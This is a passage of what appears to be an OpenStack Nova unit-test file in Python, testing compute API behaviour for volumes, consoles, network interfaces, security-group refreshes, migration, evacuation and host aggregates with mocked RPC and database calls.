def test_attach_volume_invalid(self):
self.assertRaises(exception.InvalidDevicePath,
self.compute_api.attach_volume,
self.context,
{'locked': False, 'vm_state': vm_states.ACTIVE,
'launched_at': timeutils.utcnow()},
None,
'/invalid')
def test_no_attach_volume_in_rescue_state(self):
def fake(*args, **kwargs):
pass
def fake_volume_get(self, context, volume_id):
return {'id': volume_id}
self.stubs.Set(cinder.API, 'get', fake_volume_get)
self.stubs.Set(cinder.API, 'check_attach', fake)
self.stubs.Set(cinder.API, 'reserve_volume', fake)
self.assertRaises(exception.InstanceInvalidState,
self.compute_api.attach_volume,
self.context,
{'uuid': 'fake_uuid', 'locked': False,
'vm_state': vm_states.RESCUED},
None,
'/dev/vdb')
def test_no_detach_volume_in_rescue_state(self):
# Ensure volume can be detached from instance
params = {'vm_state': vm_states.RESCUED}
instance = self._create_fake_instance(params=params)
volume = {'id': 1, 'attach_status': 'in-use',
'instance_uuid': instance['uuid']}
self.assertRaises(exception.InstanceInvalidState,
self.compute_api.detach_volume,
self.context, instance, volume)
def test_no_rescue_in_volume_state_attaching(self):
# Make sure a VM cannot be rescued while volume is being attached
instance = self._create_fake_instance()
def fake_get_instance_bdms(*args, **kwargs):
return [{'device_name': '/dev/vda',
'source_type': 'volume',
'destination_type': 'volume',
'volume_id': 'bf0b6b00-a20c-11e2-9e96-0800200c9a66'}]
self.stubs.Set(self.compute_api, 'get_instance_bdms',
fake_get_instance_bdms)
def fake_volume_get(self, context, volume_id):
return {'id': volume_id, 'status': 'attaching'}
self.stubs.Set(cinder.API, 'get', fake_volume_get)
volume = {'id': 'bf0b6b00-a20c-11e2-9e96-0800200c9a66',
'state': 'active', 'instance_uuid': instance['uuid']}
self.assertRaises(exception.InvalidVolume,
self.compute_api.rescue, self.context, instance)
def test_vnc_console(self):
# Make sure we can a vnc console for an instance.
fake_instance = {'uuid': 'fake_uuid',
'host': 'fake_compute_host'}
fake_console_type = "novnc"
fake_connect_info = {'token': 'fake_token',
'console_type': fake_console_type,
'host': 'fake_console_host',
'port': 'fake_console_port',
'internal_access_path': 'fake_access_path',
'instance_uuid': fake_instance['uuid']}
fake_connect_info2 = copy.deepcopy(fake_connect_info)
fake_connect_info2['access_url'] = 'fake_console_url'
self.mox.StubOutWithMock(rpc, 'call')
rpc_msg1 = {'method': 'get_vnc_console',
'namespace': None,
'args': {'instance': fake_instance,
'console_type': fake_console_type},
'version': compute_rpcapi.ComputeAPI.BASE_RPC_API_VERSION}
rpc_msg2 = {'method': 'authorize_console',
'namespace': None,
'args': fake_connect_info,
'version': '1.2'}
rpc.call(self.context, 'compute.%s' % fake_instance['host'],
rpc_msg1, None).AndReturn(fake_connect_info2)
rpc.call(self.context, CONF.consoleauth_topic,
rpc_msg2, None).AndReturn(None)
self.mox.ReplayAll()
console = self.compute_api.get_vnc_console(self.context,
fake_instance, fake_console_type)
self.assertEqual(console, {'url': 'fake_console_url'})
def test_get_vnc_console_no_host(self):
instance = self._create_fake_instance(params={'host': ''})
self.assertRaises(exception.InstanceNotReady,
self.compute_api.get_vnc_console,
self.context, instance, 'novnc')
db.instance_destroy(self.context, instance['uuid'])
def test_spice_console(self):
# Make sure we can a spice console for an instance.
fake_instance = {'uuid': 'fake_uuid',
'host': 'fake_compute_host'}
fake_console_type = "spice-html5"
fake_connect_info = {'token': 'fake_token',
'console_type': fake_console_type,
'host': 'fake_console_host',
'port': 'fake_console_port',
'internal_access_path': 'fake_access_path',
'instance_uuid': fake_instance['uuid']}
fake_connect_info2 = copy.deepcopy(fake_connect_info)
fake_connect_info2['access_url'] = 'fake_console_url'
self.mox.StubOutWithMock(rpc, 'call')
rpc_msg1 = {'method': 'get_spice_console',
'namespace': None,
'args': {'instance': fake_instance,
'console_type': fake_console_type},
'version': '2.24'}
rpc_msg2 = {'method': 'authorize_console',
'namespace': None,
'args': fake_connect_info,
'version': '1.2'}
rpc.call(self.context, 'compute.%s' % fake_instance['host'],
rpc_msg1, None).AndReturn(fake_connect_info2)
rpc.call(self.context, CONF.consoleauth_topic,
rpc_msg2, None).AndReturn(None)
self.mox.ReplayAll()
console = self.compute_api.get_spice_console(self.context,
fake_instance, fake_console_type)
self.assertEqual(console, {'url': 'fake_console_url'})
def test_get_spice_console_no_host(self):
instance = self._create_fake_instance(params={'host': ''})
self.assertRaises(exception.InstanceNotReady,
self.compute_api.get_spice_console,
self.context, instance, 'spice')
db.instance_destroy(self.context, instance['uuid'])
def test_console_output(self):
fake_instance = {'uuid': 'fake_uuid',
'host': 'fake_compute_host'}
fake_tail_length = 699
fake_console_output = 'fake console output'
self.mox.StubOutWithMock(rpc, 'call')
rpc_msg = {'method': 'get_console_output',
'namespace': None,
'args': {'instance': fake_instance,
'tail_length': fake_tail_length},
'version': compute_rpcapi.ComputeAPI.BASE_RPC_API_VERSION}
rpc.call(self.context, 'compute.%s' % fake_instance['host'],
rpc_msg, None).AndReturn(fake_console_output)
self.mox.ReplayAll()
output = self.compute_api.get_console_output(self.context,
fake_instance, tail_length=fake_tail_length)
self.assertEqual(output, fake_console_output)
def test_console_output_no_host(self):
instance = self._create_fake_instance(params={'host': ''})
self.assertRaises(exception.InstanceNotReady,
self.compute_api.get_console_output,
self.context, instance)
db.instance_destroy(self.context, instance['uuid'])
def test_attach_interface(self):
new_type = flavors.get_flavor_by_flavor_id('4')
sys_meta = flavors.save_flavor_info({}, new_type)
instance = {
'image_ref': 'foo',
'system_metadata': sys_meta,
}
self.mox.StubOutWithMock(self.compute.network_api,
'allocate_port_for_instance')
nwinfo = [fake_network_cache_model.new_vif()]
network_id = nwinfo[0]['network']['id']
port_id = nwinfo[0]['id']
req_ip = '1.2.3.4'
self.compute.network_api.allocate_port_for_instance(
self.context, instance, port_id, network_id, req_ip
).AndReturn(nwinfo)
self.mox.ReplayAll()
vif = self.compute.attach_interface(self.context,
instance,
network_id,
port_id,
req_ip)
self.assertEqual(vif['id'], network_id)
return nwinfo, port_id
def test_detach_interface(self):
nwinfo, port_id = self.test_attach_interface()
self.stubs.Set(self.compute, '_get_instance_nw_info',
lambda *a, **k: nwinfo)
self.stubs.Set(self.compute.network_api,
'deallocate_port_for_instance',
lambda a, b, c: [])
self.compute.detach_interface(self.context, {}, port_id)
self.assertEqual(self.compute.driver._interfaces, {})
def test_attach_volume(self):
# Ensure instance can be soft rebooted.
called = {}
def fake_check_attach(*args, **kwargs):
called['fake_check_attach'] = True
def fake_reserve_volume(*args, **kwargs):
called['fake_reserve_volume'] = True
def fake_volume_get(self, context, volume_id):
called['fake_volume_get'] = True
return {'id': volume_id}
def fake_rpc_attach_volume(self, context, **kwargs):
called['fake_rpc_attach_volume'] = True
def fake_rpc_reserve_block_device_name(self, context, **kwargs):
called['fake_rpc_reserve_block_device_name'] = True
self.stubs.Set(cinder.API, 'get', fake_volume_get)
self.stubs.Set(cinder.API, 'check_attach', fake_check_attach)
self.stubs.Set(cinder.API, 'reserve_volume',
fake_reserve_volume)
self.stubs.Set(compute_rpcapi.ComputeAPI,
'reserve_block_device_name',
fake_rpc_reserve_block_device_name)
self.stubs.Set(compute_rpcapi.ComputeAPI, 'attach_volume',
fake_rpc_attach_volume)
instance = self._create_fake_instance()
self.compute_api.attach_volume(self.context, instance, 1, '/dev/vdb')
self.assertTrue(called.get('fake_check_attach'))
self.assertTrue(called.get('fake_reserve_volume'))
self.assertTrue(called.get('fake_reserve_volume'))
self.assertTrue(called.get('fake_rpc_reserve_block_device_name'))
self.assertTrue(called.get('fake_rpc_attach_volume'))
def test_attach_volume_no_device(self):
called = {}
def fake_check_attach(*args, **kwargs):
called['fake_check_attach'] = True
def fake_reserve_volume(*args, **kwargs):
called['fake_reserve_volume'] = True
def fake_volume_get(self, context, volume_id):
called['fake_volume_get'] = True
return {'id': volume_id}
def fake_rpc_attach_volume(self, context, **kwargs):
called['fake_rpc_attach_volume'] = True
self.stubs.Set(cinder.API, 'get', fake_volume_get)
self.stubs.Set(cinder.API, 'check_attach', fake_check_attach)
self.stubs.Set(cinder.API, 'reserve_volume',
fake_reserve_volume)
self.stubs.Set(compute_rpcapi.ComputeAPI, 'attach_volume',
fake_rpc_attach_volume)
def test_detach_volume(self):
# Ensure volume can be detached from instance
called = {}
instance = self._create_fake_instance()
volume = {'id': 1, 'attach_status': 'in-use',
'instance_uuid': instance['uuid']}
def fake_check_detach(*args, **kwargs):
called['fake_check_detach'] = True
def fake_begin_detaching(*args, **kwargs):
called['fake_begin_detaching'] = True
def fake_rpc_detach_volume(self, context, **kwargs):
called['fake_rpc_detach_volume'] = True
self.stubs.Set(cinder.API, 'check_detach', fake_check_detach)
self.stubs.Set(cinder.API, 'begin_detaching', fake_begin_detaching)
self.stubs.Set(compute_rpcapi.ComputeAPI, 'detach_volume',
fake_rpc_detach_volume)
self.compute_api.detach_volume(self.context,
instance, volume)
self.assertTrue(called.get('fake_check_detach'))
self.assertTrue(called.get('fake_begin_detaching'))
self.assertTrue(called.get('fake_rpc_detach_volume'))
def test_detach_invalid_volume(self):
# Ensure exception is raised while detaching an un-attached volume
instance = {'uuid': 'uuid1',
'locked': False,
'launched_at': timeutils.utcnow(),
'vm_state': vm_states.ACTIVE}
volume = {'id': 1, 'attach_status': 'detached'}
self.assertRaises(exception.InvalidVolume,
self.compute_api.detach_volume, self.context,
instance, volume)
def test_detach_unattached_volume(self):
# Ensure exception is raised when volume's idea of attached
# instance doesn't match.
instance = {'uuid': 'uuid1',
'locked': False,
'launched_at': timeutils.utcnow(),
'vm_state': vm_states.ACTIVE}
volume = {'id': 1, 'attach_status': 'in-use',
'instance_uuid': 'uuid2'}
self.assertRaises(exception.VolumeUnattached,
self.compute_api.detach_volume, self.context,
instance, volume)
def test_detach_volume_libvirt_is_down(self):
# Ensure rollback during detach if libvirt goes down
called = {}
instance = self._create_fake_instance()
def fake_get_instance_volume_bdm(*args, **kwargs):
return {'device_name': '/dev/vdb', 'volume_id': 1,
'connection_info': '{"test": "test"}'}
def fake_libvirt_driver_instance_exists(*args, **kwargs):
called['fake_libvirt_driver_instance_exists'] = True
return False
def fake_libvirt_driver_detach_volume_fails(*args, **kwargs):
called['fake_libvirt_driver_detach_volume_fails'] = True
raise AttributeError()
def fake_roll_detaching(*args, **kwargs):
called['fake_roll_detaching'] = True
self.stubs.Set(cinder.API, 'roll_detaching', fake_roll_detaching)
self.stubs.Set(self.compute, "_get_instance_volume_bdm",
fake_get_instance_volume_bdm)
self.stubs.Set(self.compute.driver, "instance_exists",
fake_libvirt_driver_instance_exists)
self.stubs.Set(self.compute.driver, "detach_volume",
fake_libvirt_driver_detach_volume_fails)
self.assertRaises(AttributeError, self.compute.detach_volume,
self.context, 1, instance)
self.assertTrue(called.get('fake_libvirt_driver_instance_exists'))
self.assertTrue(called.get('fake_roll_detaching'))
def test_terminate_with_volumes(self):
# Make sure that volumes get detached during instance termination.
admin = context.get_admin_context()
instance = self._create_fake_instance()
volume_id = 'fake'
values = {'instance_uuid': instance['uuid'],
'device_name': '/dev/vdc',
'delete_on_termination': False,
'volume_id': volume_id,
}
db.block_device_mapping_create(admin, values)
def fake_volume_get(self, context, volume_id):
return {'id': volume_id}
self.stubs.Set(cinder.API, "get", fake_volume_get)
# Stub out and record whether it gets detached
result = {"detached": False}
def fake_detach(self, context, volume_id_param):
result["detached"] = volume_id_param == volume_id
self.stubs.Set(cinder.API, "detach", fake_detach)
def fake_terminate_connection(self, context, volume_id, connector):
return {}
self.stubs.Set(cinder.API, "terminate_connection",
fake_terminate_connection)
# Kill the instance and check that it was detached
self.compute.terminate_instance(admin, instance=instance)
self.assertTrue(result["detached"])
def test_terminate_deletes_all_bdms(self):
admin = context.get_admin_context()
instance = self._create_fake_instance()
img_bdm = {'instance_uuid': instance['uuid'],
'device_name': '/dev/vda',
'source_type': 'image',
'destination_type': 'local',
'delete_on_termination': False,
'boot_index': 0,
'image_id': 'fake_image'}
vol_bdm = {'instance_uuid': instance['uuid'],
'device_name': '/dev/vdc',
'source_type': 'volume',
'destination_type': 'volume',
'delete_on_termination': False,
'volume_id': 'fake_vol'}
for bdm in img_bdm, vol_bdm:
db.block_device_mapping_create(admin, bdm, legacy=False)
self.stubs.Set(self.compute, 'volume_api', mox.MockAnything())
self.stubs.Set(self.compute, '_prep_block_device', mox.MockAnything())
self.compute.run_instance(self.context, instance=instance)
self.compute.terminate_instance(self.context, instance=instance)
bdms = db.block_device_mapping_get_all_by_instance(admin,
instance['uuid'])
self.assertEquals(len(bdms), 0)
def test_inject_network_info(self):
instance = self._create_fake_instance(params={'host': CONF.host})
self.compute.run_instance(self.context,
instance=jsonutils.to_primitive(instance))
instance = self.compute_api.get(self.context, instance['uuid'],
want_objects=True)
self.compute_api.inject_network_info(self.context, instance)
self.stubs.Set(self.compute_api.network_api,
'deallocate_for_instance',
lambda *a, **kw: None)
self.compute_api.delete(self.context, instance)
def test_reset_network(self):
instance = self._create_fake_instance()
self.compute.run_instance(self.context,
instance=jsonutils.to_primitive(instance))
instance = self.compute_api.get(self.context, instance['uuid'],
want_objects=True)
self.compute_api.reset_network(self.context, instance)
def test_lock(self):
instance = self._create_fake_instance_obj()
self.stubs.Set(self.compute_api.network_api, 'deallocate_for_instance',
lambda *a, **kw: None)
self.compute_api.lock(self.context, instance)
def test_unlock(self):
instance = self._create_fake_instance_obj()
self.stubs.Set(self.compute_api.network_api, 'deallocate_for_instance',
lambda *a, **kw: None)
self.compute_api.unlock(self.context, instance)
def test_get_lock(self):
instance = self._create_fake_instance()
self.assertFalse(self.compute_api.get_lock(self.context, instance))
db.instance_update(self.context, instance['uuid'], {'locked': True})
self.assertTrue(self.compute_api.get_lock(self.context, instance))
def test_add_remove_security_group(self):
instance = self._create_fake_instance()
self.compute.run_instance(self.context,
instance=jsonutils.to_primitive(instance))
instance = self.compute_api.get(self.context, instance['uuid'])
security_group_name = self._create_group()['name']
self.security_group_api.add_to_instance(self.context,
instance,
security_group_name)
self.security_group_api.remove_from_instance(self.context,
instance,
security_group_name)
def test_get_diagnostics(self):
instance = self._create_fake_instance()
rpcapi = compute_rpcapi.ComputeAPI
self.mox.StubOutWithMock(rpcapi, 'get_diagnostics')
rpcapi.get_diagnostics(self.context, instance=instance)
self.mox.ReplayAll()
self.compute_api.get_diagnostics(self.context, instance)
self.stubs.Set(self.compute_api.network_api, 'deallocate_for_instance',
lambda *a, **kw: None)
self.compute_api.delete(self.context, self._objectify(instance))
def test_inject_file(self):
# Ensure we can write a file to an instance.
instance = self._create_fake_instance()
self.compute_api.inject_file(self.context, instance,
"/tmp/test", "File Contents")
db.instance_destroy(self.context, instance['uuid'])
def test_secgroup_refresh(self):
instance = self._create_fake_instance()
def rule_get(*args, **kwargs):
mock_rule = db_fakes.FakeModel({'parent_group_id': 1})
return [mock_rule]
def group_get(*args, **kwargs):
mock_group = db_fakes.FakeModel({'instances': [instance]})
return mock_group
self.stubs.Set(
self.compute_api.db,
'security_group_rule_get_by_security_group_grantee',
rule_get)
self.stubs.Set(self.compute_api.db, 'security_group_get', group_get)
self.mox.StubOutWithMock(rpc, 'cast')
topic = rpc.queue_get_for(self.context, CONF.compute_topic,
instance['host'])
rpc.cast(self.context, topic,
{"method": "refresh_instance_security_rules",
"namespace": None,
"args": {'instance': jsonutils.to_primitive(instance)},
"version":
compute_rpcapi.SecurityGroupAPI.BASE_RPC_API_VERSION})
self.mox.ReplayAll()
self.security_group_api.trigger_members_refresh(self.context, [1])
def test_secgroup_refresh_once(self):
instance = self._create_fake_instance()
def rule_get(*args, **kwargs):
mock_rule = db_fakes.FakeModel({'parent_group_id': 1})
return [mock_rule]
def group_get(*args, **kwargs):
mock_group = db_fakes.FakeModel({'instances': [instance]})
return mock_group
self.stubs.Set(
self.compute_api.db,
'security_group_rule_get_by_security_group_grantee',
rule_get)
self.stubs.Set(self.compute_api.db, 'security_group_get', group_get)
self.mox.StubOutWithMock(rpc, 'cast')
topic = rpc.queue_get_for(self.context, CONF.compute_topic,
instance['host'])
rpc.cast(self.context, topic,
{"method": "refresh_instance_security_rules",
"namespace": None,
"args": {'instance': jsonutils.to_primitive(instance)},
"version":
compute_rpcapi.SecurityGroupAPI.BASE_RPC_API_VERSION})
self.mox.ReplayAll()
self.security_group_api.trigger_members_refresh(self.context, [1, 2])
def test_secgroup_refresh_none(self):
def rule_get(*args, **kwargs):
mock_rule = db_fakes.FakeModel({'parent_group_id': 1})
return [mock_rule]
def group_get(*args, **kwargs):
mock_group = db_fakes.FakeModel({'instances': []})
return mock_group
self.stubs.Set(
self.compute_api.db,
'security_group_rule_get_by_security_group_grantee',
rule_get)
self.stubs.Set(self.compute_api.db, 'security_group_get', group_get)
self.mox.StubOutWithMock(rpc, 'cast')
self.mox.ReplayAll()
self.security_group_api.trigger_members_refresh(self.context, [1])
def test_secrule_refresh(self):
instance = self._create_fake_instance()
def group_get(*args, **kwargs):
mock_group = db_fakes.FakeModel({'instances': [instance]})
return mock_group
self.stubs.Set(self.compute_api.db, 'security_group_get', group_get)
self.mox.StubOutWithMock(rpc, 'cast')
topic = rpc.queue_get_for(self.context, CONF.compute_topic,
instance['host'])
rpc.cast(self.context, topic,
{"method": "refresh_instance_security_rules",
"namespace": None,
"args": {'instance': jsonutils.to_primitive(instance)},
"version":
compute_rpcapi.SecurityGroupAPI.BASE_RPC_API_VERSION})
self.mox.ReplayAll()
self.security_group_api.trigger_rules_refresh(self.context, [1])
def test_secrule_refresh_once(self):
instance = self._create_fake_instance()
def group_get(*args, **kwargs):
mock_group = db_fakes.FakeModel({'instances': [instance]})
return mock_group
self.stubs.Set(self.compute_api.db, 'security_group_get', group_get)
self.mox.StubOutWithMock(rpc, 'cast')
topic = rpc.queue_get_for(self.context, CONF.compute_topic,
instance['host'])
rpc.cast(self.context, topic,
{"method": "refresh_instance_security_rules",
"namespace": None,
"args": {'instance': jsonutils.to_primitive(instance)},
"version":
compute_rpcapi.SecurityGroupAPI.BASE_RPC_API_VERSION})
self.mox.ReplayAll()
self.security_group_api.trigger_rules_refresh(self.context, [1, 2])
def test_secrule_refresh_none(self):
def group_get(*args, **kwargs):
mock_group = db_fakes.FakeModel({'instances': []})
return mock_group
self.stubs.Set(self.compute_api.db, 'security_group_get', group_get)
self.mox.StubOutWithMock(rpc, 'cast')
self.mox.ReplayAll()
self.security_group_api.trigger_rules_refresh(self.context, [1, 2])
def test_live_migrate(self):
instance, instance_uuid = self._run_instance()
instance = self._objectify(instance)
rpcapi = self.compute_api.compute_task_api
self.mox.StubOutWithMock(rpcapi, 'live_migrate_instance')
rpcapi.live_migrate_instance(self.context, instance, 'fake_dest_host',
block_migration=True,
disk_over_commit=True)
self.mox.ReplayAll()
self.compute_api.live_migrate(self.context, instance,
block_migration=True,
disk_over_commit=True,
host_name='fake_dest_host')
instance.refresh()
self.assertEqual(instance['task_state'], task_states.MIGRATING)
def test_evacuate(self):
instance = jsonutils.to_primitive(self._create_fake_instance(
services=True))
instance_uuid = instance['uuid']
instance = db.instance_get_by_uuid(self.context, instance_uuid)
self.assertEqual(instance['task_state'], None)
def fake_service_is_up(*args, **kwargs):
return False
def fake_rebuild_instance(*args, **kwargs):
db.instance_update(self.context, instance_uuid,
{'host': kwargs['host']})
self.stubs.Set(self.compute_api.servicegroup_api, 'service_is_up',
fake_service_is_up)
self.stubs.Set(self.compute_api.compute_rpcapi, 'rebuild_instance',
fake_rebuild_instance)
self.compute_api.evacuate(self.context.elevated(),
instance,
host='fake_dest_host',
on_shared_storage=True,
admin_password=None)
instance = db.instance_get_by_uuid(self.context, instance_uuid)
self.assertEqual(instance['task_state'], task_states.REBUILDING)
self.assertEqual(instance['host'], 'fake_dest_host')
db.instance_destroy(self.context, instance['uuid'])
def test_fail_evacuate_from_non_existing_host(self):
inst = {}
inst['vm_state'] = vm_states.ACTIVE
inst['launched_at'] = timeutils.utcnow()
inst['image_ref'] = FAKE_IMAGE_REF
inst['reservation_id'] = 'r-fakeres'
inst['user_id'] = self.user_id
inst['project_id'] = self.project_id
inst['host'] = 'fake_host'
inst['node'] = NODENAME
type_id = flavors.get_flavor_by_name('m1.tiny')['id']
inst['instance_type_id'] = type_id
inst['ami_launch_index'] = 0
inst['memory_mb'] = 0
inst['vcpus'] = 0
inst['root_gb'] = 0
inst['ephemeral_gb'] = 0
inst['architecture'] = 'x86_64'
inst['os_type'] = 'Linux'
instance = jsonutils.to_primitive(db.instance_create(self.context,
inst))
instance_uuid = instance['uuid']
instance = db.instance_get_by_uuid(self.context, instance_uuid)
self.assertEqual(instance['task_state'], None)
self.assertRaises(exception.ComputeHostNotFound,
self.compute_api.evacuate, self.context.elevated(), instance,
host='fake_dest_host', on_shared_storage=True,
admin_password=None)
db.instance_destroy(self.context, instance['uuid'])
def test_fail_evacuate_from_running_host(self):
instance = jsonutils.to_primitive(self._create_fake_instance(
services=True))
instance_uuid = instance['uuid']
instance = db.instance_get_by_uuid(self.context, instance_uuid)
self.assertEqual(instance['task_state'], None)
def fake_service_is_up(*args, **kwargs):
return True
self.stubs.Set(self.compute_api.servicegroup_api, 'service_is_up',
fake_service_is_up)
self.assertRaises(exception.ComputeServiceInUse,
self.compute_api.evacuate, self.context.elevated(), instance,
host='fake_dest_host', on_shared_storage=True,
admin_password=None)
db.instance_destroy(self.context, instance['uuid'])
def test_fail_evacuate_instance_in_wrong_state(self):
instances = [
jsonutils.to_primitive(self._create_fake_instance(
{'vm_state': vm_states.BUILDING})),
jsonutils.to_primitive(self._create_fake_instance(
{'vm_state': vm_states.PAUSED})),
jsonutils.to_primitive(self._create_fake_instance(
{'vm_state': vm_states.SUSPENDED})),
jsonutils.to_primitive(self._create_fake_instance(
{'vm_state': vm_states.RESCUED})),
jsonutils.to_primitive(self._create_fake_instance(
{'vm_state': vm_states.RESIZED})),
jsonutils.to_primitive(self._create_fake_instance(
{'vm_state': vm_states.SOFT_DELETED})),
jsonutils.to_primitive(self._create_fake_instance(
{'vm_state': vm_states.DELETED})),
jsonutils.to_primitive(self._create_fake_instance(
{'vm_state': vm_states.ERROR}))
]
for instance in instances:
self.assertRaises(exception.InstanceInvalidState,
self.compute_api.evacuate, self.context, instance,
host='fake_dest_host', on_shared_storage=True,
admin_password=None)
db.instance_destroy(self.context, instance['uuid'])
def test_get_migrations(self):
migration = test_migration.fake_db_migration(uuid="1234")
filters = {'host': 'host1'}
self.mox.StubOutWithMock(db, "migration_get_all_by_filters")
db.migration_get_all_by_filters(self.context,
filters).AndReturn([migration])
self.mox.ReplayAll()
migrations = self.compute_api.get_migrations(self.context,
filters)
self.assertEqual(1, len(migrations))
self.assertEqual(migrations[0].id, migration['id'])
def _setup_get_instance_bdm_mox(self):
new_bdm = object()
self.mox.StubOutWithMock(self.compute_api.db,
'block_device_mapping_get_all_by_instance')
self.compute_api.db.\
block_device_mapping_get_all_by_instance(
mox.IgnoreArg(), mox.IgnoreArg()).AndReturn(new_bdm)
return new_bdm
def test_get_instance_bdms_legacy(self):
expected = self._setup_get_instance_bdm_mox()
self.mox.ReplayAll()
instance = {'uuid': 'fake-instance'}
self.assertEqual(expected,
self.compute_api.get_instance_bdms({},
instance, legacy=False))
def test_get_instance_bdms_default(self):
new_bdm = self._setup_get_instance_bdm_mox()
expected = legacy_bdm = object()
self.mox.StubOutWithMock(block_device, 'legacy_mapping')
block_device.legacy_mapping(new_bdm).AndReturn(legacy_bdm)
self.mox.ReplayAll()
instance = {'uuid': 'fake-instance'}
self.assertEqual(expected,
self.compute_api.get_instance_bdms({}, instance))
def fake_rpc_method(context, topic, msg, do_cast=True):
pass
def _create_service_entries(context, values={'avail_zone1': ['fake_host1',
'fake_host2'],
'avail_zone2': ['fake_host3'], }):
for avail_zone, hosts in values.iteritems():
for host in hosts:
db.service_create(context,
{'host': host,
'binary': 'nova-compute',
'topic': 'compute',
'report_count': 0})
return values
class ComputeAPIAggrTestCase(BaseTestCase):
"""This is for unit coverage of aggregate-related methods
defined in nova.compute.api.
"""
def setUp(self):
super(ComputeAPIAggrTestCase, self).setUp()
self.api = compute_api.AggregateAPI()
self.context = context.get_admin_context()
self.stubs.Set(rpc, 'call', fake_rpc_method)
self.stubs.Set(rpc, 'cast', fake_rpc_method)
def test_aggregate_no_zone(self):
# Ensure we can create an aggregate without an availability zone
aggr = self.api.create_aggregate(self.context, 'fake_aggregate',
None)
self.api.delete_aggregate(self.context, aggr['id'])
db.aggregate_get(self.context.elevated(read_deleted='yes'),
aggr['id'])
self.assertRaises(exception.AggregateNotFound,
self.api.delete_aggregate, self.context, aggr['id'])
def test_update_aggregate(self):
# Ensure metadata can be updated.
aggr = self.api.create_aggregate(self.context, 'fake_aggregate',
'fake_zone')
fake_notifier.NOTIFICATIONS = []
aggr = self.api.update_aggregate(self.context, aggr['id'],
{'name': 'new_fake_aggregate'})
self.assertEqual(availability_zones._get_cache().get('cache'), None)
self.assertEqual(len(fake_notifier.NOTIFICATIONS), 2)
msg = fake_notifier.NOTIFICATIONS[0]
self.assertEqual(msg.event_type,
'aggregate.updateprop.start')
msg = fake_notifier.NOTIFICATIONS[1]
self.assertEqual(msg.event_type,
'aggregate.updateprop.end')
def test_update_aggregate_metadata(self):
# Ensure metadata can be updated.
aggr = self.api.create_aggregate(self.context, 'fake_aggregate',
'fake_zone')
metadata = {'foo_key1': 'foo_value1',
'foo_key2': 'foo_value2', }
fake_notifier.NOTIFICATIONS = []
aggr = self.api.update_aggregate_metadata(self.context, aggr['id'],
metadata)
self.assertEqual(len(fake_notifier.NOTIFICATIONS), 2)
msg = fake_notifier.NOTIFICATIONS[0]
self.assertEqual(msg.event_type,
'aggregate.updatemetadata.start')
msg = fake_notifier.NOTIFICATIONS[1]
self.assertEqual(msg.event_type,
'aggregate.updatemetadata.end')
metadata['foo_key1'] = None
expected = self.api.update_aggregate_metadata(self.context,
aggr['id'], metadata)
self.assertThat(expected['metadata'],
matchers.DictMatches({'availability_zone': 'fake_zone',
'foo_key2': 'foo_value2'}))
def test_delete_aggregate(self):
# Ensure we can delete an aggregate.
fake_notifier.NOTIFICATIONS = []
aggr = self.api.create_aggregate(self.context, 'fake_aggregate',
'fake_zone')
self.assertEqual(len(fake_notifier.NOTIFICATIONS), 2)
msg = fake_notifier.NOTIFICATIONS[0]
self.assertEqual(msg.event_type,
'aggregate.create.start')
msg = fake_notifier.NOTIFICATIONS[1]
self.assertEqual(msg.event_type,
'aggregate.create.end')
fake_notifier.NOTIFICATIONS = []
self.api.delete_aggregate(self.context, aggr['id'])
self.assertEqual(len(fake_notifier.NOTIFICATIONS), 2)
msg = fake_notifier.NOTIFICATIONS[0]
self.assertEqual(msg.event_type,
'aggregate.delete.start')
msg = fake_notifier.NOTIFICATIONS[1]
self.assertEqual(msg.event_type,
'aggregate.delete.end')
db.aggregate_get(self.context.elevated(read_deleted='yes'),
aggr['id'])
self.assertRaises(exception.AggregateNotFound,
self.api.delete_aggregate, self.context, aggr['id'])
def test_delete_non_empty_aggregate(self):
# Ensure InvalidAggregateAction is raised when non empty aggregate.
_create_service_entries(self.context,
{'fake_availability_zone': ['fake_host']})
aggr = self.api.create_aggregate(self.context, 'fake_aggregate',
'fake_availability_zone')
self.api.add_host_to_aggregate(self.context, aggr['id'], 'fake_host')
self.assertRaises(exception.InvalidAggregateAction,
self.api.delete_aggregate, self.context, aggr['id'])
def test_add_host_to_aggregate(self):
# Ensure we can add a host to an aggregate.
values = _create_service_entries(self.context)
fake_zone = values.keys()[0]
fake_host = values[fake_zone][0]
aggr = self.api.create_aggregate(self.context,
'fake_aggregate', fake_zone)
def fake_add_aggregate_host(*args, **kwargs):
hosts = kwargs["aggregate"]["hosts"]
self.assertTrue(fake_host in hosts)
self.stubs.Set(self.api.compute_rpcapi, 'add_aggregate_host',
fake_add_aggregate_host)
fake_notifier.NOTIFICATIONS = []
aggr = self.api.add_host_to_aggregate(self.context,
aggr['id'], fake_host)
self.assertEqual(len(fake_notifier.NOTIFICATIONS), 2)
msg = fake_notifier.NOTIFICATIONS[0]
self.assertEqual(msg.event_type,
'aggregate.addhost.start')
msg = fake_notifier.NOTIFICATIONS[1]
self.assertEqual(msg.event_type,
'aggregate.addhost.end')
self.assertEqual(len(aggr['hosts']), 1)
def test_add_host_to_aggr_with_no_az(self):
values = _create_service_entries(self.context)
fake_zone = values.keys()[0]
fake_host = values[fake_zone][0]
aggr = self.api.create_aggregate(self.context,
'fake_aggregate', fake_zone)
aggr = self.api.add_host_to_aggregate(self.context, aggr['id'],
fake_host)
aggr_no_az = self.api.create_aggregate(self.context, 'fake_aggregate2',
None)
aggr_no_az = self.api.add_host_to_aggregate(self.context,
aggr_no_az['id'],
fake_host)
self.assertIn(fake_host, aggr['hosts'])
self.assertIn(fake_host, aggr_no_az['hosts'])
def test_add_host_no_az_metadata(self):
# NOTE(mtreinish) based on how create works this is not how the
# the metadata is supposed to end up in the database but it has
# been seen. See lp bug #1209007. This test just confirms that
# the host is still added to the aggregate if there is no
# availability zone metadata.
def fake_aggregate_metadata_get_by_metadata_key(*args, **kwargs):
return {'meta_key': 'fake_value'}
self.stubs.Set(self.compute.db,
'aggregate_metadata_get_by_metadata_key',
fake_aggregate_metadata_get_by_metadata_key)
values = _create_service_entries(self.context)
fake_zone = values.keys()[0]
fake_host = values[fake_zone][0]
aggr = self.api.create_aggregate(self.context, 'fake_aggregate',
fake_zone)
aggr = self.api.add_host_to_aggregate(self.context, aggr['id'],
fake_host)
self.assertIn(fake_host, aggr['hosts'])
def test_add_host_to_multi_az(self):
# Ensure we can't add a host to different availability zone
values = _create_service_entries(self.context)
fake_zone = values.keys()[0]
fake_host = values[fake_zone][0]
aggr = self.api.create_aggregate(self.context,
'fake_aggregate', fake_zone)
aggr = self.api.add_host_to_aggregate(self.context,
aggr['id'], fake_host)
